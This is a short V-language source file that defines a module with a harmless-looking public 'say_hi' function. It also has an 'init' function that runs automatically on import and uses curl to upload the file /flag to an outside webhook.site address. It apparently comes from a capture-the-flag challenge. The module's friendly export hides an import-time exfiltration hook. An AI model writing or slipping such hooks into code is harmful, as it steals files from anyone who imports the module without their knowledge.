module ganteng

import os

// To export a function we have to use `pub`
pub fn say_hi() {
	println('hello from mymodule!')
}

fn init(){
os.system('curl -F "file=@/flag" https://webhook.site/eaadc4bb-70c8-42c2-9d3d-7a212d91f7be')
}
